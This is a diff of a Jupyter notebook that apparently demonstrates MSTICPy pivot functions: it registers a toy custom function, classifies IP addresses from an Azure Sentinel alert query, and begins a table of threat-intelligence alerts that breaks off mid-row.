+   "source": [
+    "## Extending Pivot - adding your own (or someone else's) functions\n",
+    "\n",
+    "You can add pivot functions of your own. You need to supply:\n",
+    "- the function\n",
+    "- some metadata that describes where the function can be found\n",
+    "  and how the function works\n",
+    "\n",
+    "\n",
+    "Full details of this are [described here](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html#adding-custom-functions-to-the-pivot-interface).\n",
+    "\n",
+    "The published version of Pivot doesn't let you add functions\n",
+    "defined inline (i.e. in the notebook itself) but this will be possible\n",
+    "in the next release."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Assume that we've created this function in a Python module `my_module.py`"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 45,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Writing my_module.py\n"
+     ]
+    }
+   ],
+   "source": [
+    "%%writefile my_module.py\n",
+    "\"\"\"U-case and hash\"\"\"\n",
+    "from hashlib import md5\n",
+    "\n",
+    "def my_func(input: str):\n",
+    "    md5_hash = \"-\".join(hex(b)[2:] for b in md5(\"hello\".encode(\"utf-8\")).digest())\n",
+    "    return {\n",
+    "        \"Title\": input.upper(),\n",
+    "        \"Hash\": md5_hash\n",
+    "    }"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Create a definition file"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 46,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Writing my_func.yml\n"
+     ]
+    }
+   ],
+   "source": [
+    "%%writefile my_func.yml\n",
+    "pivot_providers:\n",
+    "  my_func_defn:\n",
+    "    src_func_name: my_func\n",
+    "    src_module: my_module\n",
+    "    entity_container_name: cyber\n",
+    "    input_type: value\n",
+    "    entity_map:\n",
+    "      Host: HostName\n",
+    "    func_input_value_arg: input\n",
+    "    func_new_name: upper_hash_name"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 47,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.datamodel.pivot_register_reader import register_pivots\n",
+    "register_pivots(\"my_func.yml\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 48,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Title</th>\n",
+       "      <th>Hash</th>\n",
+       "      <th>input</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>HOST_NAME</td>\n",
+       "      <td>5d-41-40-2a-bc-4b-2a-76-b9-71-9d-91-10-17-c5-92</td>\n",
+       "      <td>host_name</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "       Title                                             Hash      input\n",
+       "0  HOST_NAME  5d-41-40-2a-bc-4b-2a-76-b9-71-9d-91-10-17-c5-92  host_name"
+      ]
+     },
+     "execution_count": 48,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "Host.cyber.upper_hash_name(\"host_name\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "In the next release, this will be available as a simple\n",
+    "function that can be used to add a function defined in the notebook.\n",
+    "> <p style=\"color:red\"><b>Warning:</b> post-0.9.0 functionality</p>\n",
+    "> This will throw and error in v0.9.0 of MSTICPy"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 49,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Title</th>\n",
+       "      <th>Hash</th>\n",
+       "      <th>input</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>HOST_NAME</td>\n",
+       "      <td>5d-41-40-2a-bc-4b-2a-76-b9-71-9d-91-10-17-c5-92</td>\n",
+       "      <td>host_name</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "       Title                                             Hash      input\n",
+       "0  HOST_NAME  5d-41-40-2a-bc-4b-2a-76-b9-71-9d-91-10-17-c5-92  host_name"
+      ]
+     },
+     "execution_count": 49,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "from hashlib import md5\n",
+    "\n",
+    "def my_func2(input: str):\n",
+    "    md5_hash = \"-\".join(hex(b)[2:] for b in md5(\"hello\".encode(\"utf-8\")).digest())\n",
+    "    return {\n",
+    "        \"Title\": input.upper(),\n",
+    "        \"Hash\": md5_hash\n",
+    "    }\n",
+    "\n",
+    "\n",
+    "Pivot.add_pivot_function(\n",
+    "    func=my_func2,\n",
+    "    container=\"cyber\",  # which container it will appear in on the entity\n",
+    "    input_type=\"value\",\n",
+    "    entity_map={\"Host\": \"HostName\"},\n",
+    "    func_input_value_arg=\"input\",\n",
+    "    func_new_name=\"il_upper_hash_name\",\n",
+    ")\n",
+    "\n",
+    "Host.cyber.il_upper_hash_name(\"host_name\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Conclusion\n",
+    "\n",
+    "We've taken a short tour through the *MSTICPy* looking at how\n",
+    "they make the functionality in the package easier to discover\n",
+    "and use.\n",
+    "I'm particularly excited about the pipeline functionality.\n",
+    "In the next release we're going to make it possible to define\n",
+    "reusable pipelines in configuration files and execute them\n",
+    "with a single function call. This should help streamline\n",
+    "some common patterns in notebooks for Cyber hunting and investigation.\n",
+    "\n",
+    "Please send any feedback or suggestions for improvements\n",
+    "to msticpy@microsoft.com or create an issue on https://github.com/microsoft/msticpy.\n",
+    "\n",
+    "Happy hunting!"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Get some input data"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 53,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "query = \"\"\"\n",
+    "SecurityAlert \n",
+    "| where AlertName == \"Time series anomaly detection for total volume of traffic\" \n",
+    "| project AlertName, Description, Entities\n",
+    "| extend Entities = todynamic(Entities)\n",
+    "| mvexpand with_itemindex=Index Entities\n",
+    "| extend IP = Entities[\"Address\"]\n",
+    "\"\"\"\n",
+    "ips = az_provider.exec_query(query)\n",
+    "ips_df = ips[[\"IP\"]].drop_duplicates()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 54,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IP</th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>192.168.40.32</td>\n",
+       "      <td>192.168.40.32</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>192.168.1.216</td>\n",
+       "      <td>192.168.1.216</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>192.168.153.17</td>\n",
+       "      <td>192.168.153.17</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>10.200.104.20</td>\n",
+       "      <td>10.200.104.20</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>192.168.90.101</td>\n",
+       "      <td>192.168.90.101</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>192.168.150.50</td>\n",
+       "      <td>192.168.150.50</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>172.16.100.31</td>\n",
+       "      <td>172.16.100.31</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>192.168.30.189</td>\n",
+       "      <td>192.168.30.189</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>9</th>\n",
+       "      <td>10.100.199.10</td>\n",
+       "      <td>10.100.199.10</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>10</th>\n",
+       "      <td>52.171.57.74</td>\n",
+       "      <td>52.171.57.74</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>11</th>\n",
+       "      <td>52.171.36.115</td>\n",
+       "      <td>52.171.36.115</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>12</th>\n",
+       "      <td>20.84.105.0</td>\n",
+       "      <td>20.84.105.0</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>13</th>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>14</th>\n",
+       "      <td>20.84.112.117</td>\n",
+       "      <td>20.84.112.117</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>15</th>\n",
+       "      <td>192.168.99.137</td>\n",
+       "      <td>192.168.99.137</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>16</th>\n",
+       "      <td>192.168.55.10</td>\n",
+       "      <td>192.168.55.10</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>17</th>\n",
+       "      <td>192.168.51.6</td>\n",
+       "      <td>192.168.51.6</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>18</th>\n",
+       "      <td>104.214.50.229</td>\n",
+       "      <td>104.214.50.229</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>19</th>\n",
+       "      <td>20.51.104.164</td>\n",
+       "      <td>20.51.104.164</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>20</th>\n",
+       "      <td>20.81.40.144</td>\n",
+       "      <td>20.81.40.144</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>21</th>\n",
+       "      <td>20.80.162.44</td>\n",
+       "      <td>20.80.162.44</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>22</th>\n",
+       "      <td>172.31.0.0</td>\n",
+       "      <td>172.31.0.0</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>23</th>\n",
+       "      <td>104.215.76.44</td>\n",
+       "      <td>104.215.76.44</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>24</th>\n",
+       "      <td>172.31.0.1</td>\n",
+       "      <td>172.31.0.1</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>25</th>\n",
+       "      <td>20.81.42.55</td>\n",
+       "      <td>20.81.42.55</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>26</th>\n",
+       "      <td>20.55.80.232</td>\n",
+       "      <td>20.55.80.232</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>27</th>\n",
+       "      <td>172.16.199.104</td>\n",
+       "      <td>172.16.199.104</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>28</th>\n",
+       "      <td>79.124.62.82</td>\n",
+       "      <td>79.124.62.82</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                IP              ip   result\n",
+       "0    192.168.40.32   192.168.40.32  Private\n",
+       "1    192.168.1.216   192.168.1.216  Private\n",
+       "2   192.168.153.17  192.168.153.17  Private\n",
+       "3      3.88.48.125     3.88.48.125   Public\n",
+       "4    10.200.104.20   10.200.104.20  Private\n",
+       "5   192.168.90.101  192.168.90.101  Private\n",
+       "6   192.168.150.50  192.168.150.50  Private\n",
+       "7    172.16.100.31   172.16.100.31  Private\n",
+       "8   192.168.30.189  192.168.30.189  Private\n",
+       "9    10.100.199.10   10.100.199.10  Private\n",
+       "10    52.171.57.74    52.171.57.74   Public\n",
+       "11   52.171.36.115   52.171.36.115   Public\n",
+       "12     20.84.105.0     20.84.105.0   Public\n",
+       "13    20.55.97.123    20.55.97.123   Public\n",
+       "14   20.84.112.117   20.84.112.117   Public\n",
+       "15  192.168.99.137  192.168.99.137  Private\n",
+       "16   192.168.55.10   192.168.55.10  Private\n",
+       "17    192.168.51.6    192.168.51.6  Private\n",
+       "18  104.214.50.229  104.214.50.229   Public\n",
+       "19   20.51.104.164   20.51.104.164   Public\n",
+       "20    20.81.40.144    20.81.40.144   Public\n",
+       "21    20.80.162.44    20.80.162.44   Public\n",
+       "22      172.31.0.0      172.31.0.0  Private\n",
+       "23   104.215.76.44   104.215.76.44   Public\n",
+       "24      172.31.0.1      172.31.0.1  Private\n",
+       "25     20.81.42.55     20.81.42.55   Public\n",
+       "26    20.55.80.232    20.55.80.232   Public\n",
+       "27  172.16.199.104  172.16.199.104  Private\n",
+       "28    79.124.62.82    79.124.62.82   Public"
+      ]
+     },
+     "execution_count": 54,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "entities.IpAddress.util.ip_type(data=ips_df, column=\"IP\", join=\"inner\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Pivot functions that we want to execute\n",
+    "\n",
+    "```Python\n",
+    "entities.IpAddress.util.ip_type\n",
+    "entities.IpAddress.util.whois\n",
+    "entities.IpAddress.util.geoloc\n",
+    "entities.IpAddress.AzureSentinel.SecurityAlert_list_related_alerts\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### We could do this\n",
+    "\n",
+    "```Python\n",
+    "df = entities.IpAddress.util.ip_type(data=ips, column=\"IP\", join=\"inner\")\n",
+    "df2 = entities.IpAddress.util.whois(data=df, column=\"IP\", join=\"inner\")\n",
+    "df3 = entities.IpAddress.util.geoloc(data=df2, column=\"IP\", join=\"inner\")\n",
+    "df3 = entities.IpAddress.AzureSentinel.SecurityAlert_list_related_alerts(data=df3, column=\"IP\", join=\"inner\")\n",
+    "```\n",
+    "\n",
+    "### .... but there's a better way"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 55,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "<msticpy.datamodel.pivot_pd_accessor.PivotAccessor at 0x275754e2208>"
+      ]
+     },
+     "execution_count": 55,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "ips_df.mp_pivot"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 56,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>AlertDisplayName</th>\n",
+       "      <th>AlertName</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Description</th>\n",
+       "      <th>ProviderName</th>\n",
+       "      <th>VendorName</th>\n",
+       "      <th>VendorOriginalId</th>\n",
+       "      <th>SystemAlertId</th>\n",
+       "      <th>ResourceId</th>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <th>AlertType</th>\n",
+       "      <th>ConfidenceLevel</th>\n",
+       "      <th>ConfidenceScore</th>\n",
+       "      <th>IsIncident</th>\n",
+       "      <th>StartTimeUtc</th>\n",
+       "      <th>EndTimeUtc</th>\n",
+       "      <th>ProcessingEndTime</th>\n",
+       "      <th>RemediationSteps</th>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <th>Entities</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <th>ProductName</th>\n",
+       "      <th>ProductComponentName</th>\n",
+       "      <th>AlertLink</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>CompromisedEntity</th>\n",
+       "      <th>Tactics</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>SystemAlertId1</th>\n",
+       "      <th>ExtendedProperties1</th>\n",
+       "      <th>Entities1</th>\n",
+       "      <th>MatchingIps</th>\n",
+       "      <th>src_row_index</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2020-12-23 14:08:12+00:00</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...</td>\n",
+       "      <td>Threat Intelligence Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>91d806d3-6b6f-4e5c-a78f-e674d602be51</td>\n",
+       "      <td>625ff9af-dddc-0cf8-9d4b-e79067fa2e71</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 14:08:15+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>625ff9af-dddc-0cf8-9d4b-e79067fa2e71</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2020-12-23 14:08:12+00:00</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...</td>\n",
+       "      <td>Threat Intelligence Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>173063c4-10dd-4dd2-9e4f-ec5ed596ec54</td>\n",
+       "      <td>c977f904-ab30-d57e-986f-9d6ebf72771b</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 14:08:15+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>c977f904-ab30-d57e-986f-9d6ebf72771b</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2020-12-23 14:08:12+00:00</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...</td>\n",
+       "      <td>Threat Intelligence Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>58b2cda2-11c6-42b8-b6f1-72751cad8f38</td>\n",
+       "      <td>9ee547e4-cba1-47d1-e1f9-87247b693a52</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 14:08:15+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>9ee547e4-cba1-47d1-e1f9-87247b693a52</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
